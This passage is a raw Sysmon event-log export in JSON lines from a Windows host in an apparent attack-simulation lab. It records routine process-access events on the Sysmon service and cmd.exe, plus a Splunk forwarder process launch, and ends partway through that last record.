{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3875,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.762\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.762","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3876,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.762\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.762","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3877,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.762\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.762","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3878,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.762\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.762","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3879,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.762\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.762","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3880,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.762\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.762","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3881,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.762\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.762","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3882,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.762\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-00106CAA0500}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.762","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-00106CAA0500}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3883,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.780\r\nProcessGuid: {E2A3D6B1-1106-5F25-0000-00102DAB0500}\r\nProcessId: 4912\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal check-xml-files --answer-yes --no-prompt \r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: 